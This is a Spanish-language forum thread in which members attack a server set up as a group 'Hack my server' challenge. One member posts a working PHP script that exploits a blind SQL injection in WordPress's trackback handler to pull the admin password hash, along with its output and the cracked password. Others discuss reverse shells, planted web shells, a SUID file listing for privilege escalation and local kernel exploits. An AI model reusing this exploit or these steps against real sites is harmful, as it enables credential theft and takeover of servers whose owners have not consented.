Hack my server II

WHK · 2 Agosto 2014, 01:49 AM

char(1,1,1,1) reemplazas los unos por el valor decimal del caracter.

Miren esto:

whk@whk-machine:~/Escritorio$ php poc.php
Obteniendo hash...
Buscando sobre el caracter 'a'...
Caracter encontrado!, faltan 31 caracteres mas.
Buscando sobre el caracter 'b'...
Buscando sobre el caracter 'c'...
Buscando sobre el caracter 'd'...

xD el hash comienza con a7 y está sacando el resto de los carácteres

Acá dejo el script que hice:

Código (php) [Seleccionar]

<?php

echo "Obteniendo hash...\n";
$hash = '';

for($n = 1; $n <= 32; $n++){
 foreach(array('a','b','c','d','e','f','0','1','2','3','4','5','6','7','8','9') as $caracter){
  echo "Buscando sobre el caracter '".$caracter."'...\n";

  $postdata = 'charset=UTF-7&title= -- a&url= -- a&excerpt= -- a&blog_name=a%2bACc-) union select user_pass from wp_users where ID=1 and SUBSTRING(user_pass, '.$n.', 1)=CHAR('.ord($caracter).') limit 1 -- -';

  $resultado = file_get_contents('http://vps84472.ovh.net/wp-trackback.php?p=1', false, stream_context_create(array('http' =>
   array(
    'method'   => 'POST',
    'header'  => 'Content-type: application/x-www-form-urlencoded',
    'content'  => $postdata
   )
  )));

  if(strpos($resultado, 'Duplicate comment') !== false){
   /* Carácter encontrado */
   $hash .= $caracter;
   echo "Caracter encontrado!, faltan ".(32 - $n)." caracteres mas.\n";
   break;

  }else{
   /* Carácter no válido */
  }

 }
}

echo "Hash: ".$hash."\n";

Con esto en unos 15 minutos mas tengo el hash y el acceso al panel de administración. Ahora debo salir y el fin de semana no se si estaré xD asi que nos vemos otro día.

Edito:

Código [Seleccionar]

Buscando sobre el caracter '7'...
Caracter encontrado!, faltan 30 caracteres mas.
Buscando sobre el caracter 'a'...
Buscando sobre el caracter 'b'...
Buscando sobre el caracter 'c'...
Caracter encontrado!, faltan 29 caracteres mas.
Buscando sobre el caracter 'a'...
Buscando sobre el caracter 'b'...
Buscando sobre el caracter 'c'...

xD

MinusFour · 2 Agosto 2014, 02:00 AM

Cita de: WHK en 2 Agosto 2014, 01:49 AM
char(1,1,1,1) reemplazas los unos por el valor decimal del caracter.

Miren esto:

Código [Seleccionar] Expandir
whk@whk-machine:~/Escritorio$ php poc.php Obteniendo hash... Buscando sobre el caracter 'a'... Caracter encontrado!, faltan 31 caracteres mas. Buscando sobre el caracter 'b'... Buscando sobre el caracter 'c'... Buscando sobre el caracter 'd'...

xD el hash comienza con a7 y está sacando el resto de los carácteres

Acá dejo el script que hice:
Código (php) [Seleccionar] Expandir
<?php echo "Obteniendo hash...\n"; $hash = ''; for($n = 1; $n <= 32; $n++){ foreach(array('a','b','c','d','e','f','0','1','2','3','4','5','6','7','8','9') as $caracter){ echo "Buscando sobre el caracter '".$caracter."'...\n"; $postdata = 'charset=UTF-7&title= -- a&url= -- a&excerpt= -- a&blog_name=a%2bACc-) union select user_pass from wp_users where ID=1 and SUBSTRING(user_pass, '.$n.', 1)=CHAR('.ord($caracter).') limit 1 -- -'; $resultado = file_get_contents('http://web/wp-trackback.php?p=1', false, stream_context_create(array('http' => array( 'method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => $postdata ) ))); if(strpos($resultado, 'Duplicate comment') !== false){ /* Carácter encontrado */ $hash .= $caracter; echo "Caracter encontrado!, faltan ".(32 - $n)." caracteres mas.\n"; break; }else{ /* Carácter no válido */ } } } echo "Hash: ".$hash."\n";

Con esto en unos 15 minutos mas tengo el hash y el acceso al panel de administración. Ahora debo salir y el fin de semana no se si estaré xD asi que nos vemos otro día.

Edito:
Código [Seleccionar] Expandir
Buscando sobre el caracter '7'... Caracter encontrado!, faltan 30 caracteres mas. Buscando sobre el caracter 'a'... Buscando sobre el caracter 'b'... Buscando sobre el caracter 'c'... Caracter encontrado!, faltan 29 caracteres mas. Buscando sobre el caracter 'a'... Buscando sobre el caracter 'b'... Buscando sobre el caracter 'c'...

xD

Por cierto esta versión de PHP es 5.5 no tiene magic quotes xD.

Edit: Hay un archivo de phpinfo ahí por si lo quieren revisar:

http://web/wp-content/uploads/phpinfo.php

Edit2: WHK dejaste la ip otra vez xD.

WHK · 2 Agosto 2014, 02:07 AM

Pues cuando usaba comillas dobles para la consulta sql me arrojaba backslashses, talves era el escape de alguna funcion de wordpress. De todas maneras ya está solucionado, me faltan solo 15 carácteres, ya debo irme, adios.

Mi ip no importa, se las regalo xd, el día en que tenga que hacerlo en un sitio mas serio no lo voy a hacer desde mi ip o desde mi red

WHK · 2 Agosto 2014, 02:13 AM

hash encontrado: a7c85c1a6114797d06425195899a8abe

Método rápido: reversar el md5:
http://www.hashkiller.co.uk/md5-decrypter.aspx
We found 1 hashes! [Timer: 134 m/s] Please find them below...
a7c85c1a6114797d06425195899a8abe MD5 : 2bc11f

El método lento sería averiguar la estructura de la cookie e inyectarme la cookie con el hash en el navegador y me autenticaría sea cual sea la contraseña (en el caso de que el pass fuera imposible de reversar).

Ahora si adios xd, pd: prueben el script del template y el del backup para ejecutar código.
http://web.com/?p=21

Saludos.

MinusFour · 2 Agosto 2014, 02:18 AM

Cita de: WHK en 2 Agosto 2014, 02:07 AM
Pues cuando usaba comillas dobles para la consulta sql me arrojaba backslashses, talves era el escape de alguna funcion de wordpress. De todas maneras ya está solucionado, me faltan solo 15 carácteres, ya debo irme, adios.

Mi ip no importa, se las regalo xd, el día en que tenga que hacerlo en un sitio mas serio no lo voy a hacer desde mi ip o desde mi red

Si no es tu ip es la de dimitrix XDDDDDDDDDD

Edit: Alguien ya esta haciendo su conexión en reversa y de paso se borro mi shell eh XDDDDDDDDDDDDDDDDDDD

No seais tan cabrones, si esto solo es para aprender LOL

dRak0 · 2 Agosto 2014, 02:36 AM

-rwsr-xr-x 1 root root 44176 May 16 2013 /bin/ping
-rwsr-xr-x 1 root root 94792 Jun 12 2013 /bin/mount
-rwsr-xr-x 1 root root 44688 May 16 2013 /bin/ping6
-rwsr-xr-x 1 root root 36936 Jul 26 2013 /bin/su
-rwsr-xr-x 1 root root 69120 Jun 12 2013 /bin/umount
-rwxr-sr-x 1 root shadow 35536 May 18 2013 /sbin/unix_chkpwd
-rwsr-xr-x 1 root root 121112 Mar 11 08:24 /usr/bin/sudo
-rwsr-xr-x 1 root root 32464 Jul 26 2013 /usr/bin/newgrp
-rwxr-sr-x 1 root ssh 129120 Apr 29 19:54 /usr/bin/ssh-agent
-rwsr-sr-x 1 root mail 89216 Jun 8 2012 /usr/bin/procmail
-rwsr-xr-x 1 root root 23104 May 16 2013 /usr/bin/traceroute6.iputils
-rwxr-sr-x 1 root shadow 23360 Jul 26 2013 /usr/bin/expiry
-rwsr-xr-x 1 root root 68152 Jul 26 2013 /usr/bin/gpasswd
-rwxr-sr-x 1 root tty 19024 Jun 12 2013 /usr/bin/wall
-rwxr-sr-x 1 root shadow 54968 Jul 26 2013 /usr/bin/chage
-rwsr-xr-x 1 root root 41336 Jul 26 2013 /usr/bin/chsh
-rwxr-sr-x 1 root mail 18672 Jun 8 2012 /usr/bin/lockfile
-rwxr-sr-x 1 root crontab 35984 Feb 9 2013 /usr/bin/crontab
-rwsr-xr-x 1 root root 47032 Jul 26 2013 /usr/bin/passwd
-rwsr-xr-x 1 root root 18928 May 16 2013 /usr/bin/arping
-rwxr-sr-x 1 root tty 14688 Jun 4 2013 /usr/bin/bsd-write
-rwsr-xr-x 1 root root 46424 Jul 26 2013 /usr/bin/chfn
-rwxr-sr-x 1 root utmp 380088 Aug 19 2013 /usr/bin/screen
-rwxr-sr-x 1 root mlocate 39520 Jun 20 2013 /usr/bin/mlocate
-rwxr-sr-x 1 root mail 14848 Jun 5 2013 /usr/bin/dotlockfile
-rwsr-xr-x 1 root root 10208 Sep 10 2013 /usr/sbin/sensible-mda
-rwsr-sr-x 1 libuuid libuuid 18904 Jun 12 2013 /usr/sbin/uuidd
-rwxr-sr-x 1 root smmsp 82816 Sep 10 2013 /usr/lib/sm.bin/mailstats
-rwxr-sr-x 1 root smmsp 851840 Sep 10 2013 /usr/lib/sm.bin/sendmail
-rwsr-xr-x 1 root root 249704 Apr 29 19:54 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10368 Oct 12 2013 /usr/lib/pt_chown

A escalar privilegios bitchess...!

xustyx · 2 Agosto 2014, 02:46 AM

Yo piro a sobar ya estoy rebentao encima no se por que cojones no me piya la reverse shell... tengo abierta hasta la puerta de mi casa XD

Y bueno con la shell que ya hay se puede intentar buscar un exploit local que los hay a patadas.

uname -a

Hasta mañana!!

PD: Mañana saco al kali a pasear.

MinusFour · 2 Agosto 2014, 03:17 AM

Yo ya estoy conectado pero no será tan fácil como compilar un exploit y listo, porque en primera no hay gcc xDDD

Por cierto, hay alguien que tiene acceso al servidor que está poniendo cosas a las shells LOL y es pura joda pero bueno xD.

#!drvy · 2 Agosto 2014, 03:35 AM

llamen a dimitrix, que instale gcc ·_·
xD

Saludos

MinusFour · 2 Agosto 2014, 03:51 AM

Cita de: #!drvy en 2 Agosto 2014, 03:35 AM
llamen a dimitrix, que instale gcc ·_·
xD

Saludos

Yo ya he probado mi primer exploit, lo he compilado en mi maquina y lo he corrido pero... el exploit no es para debian/slackware xD.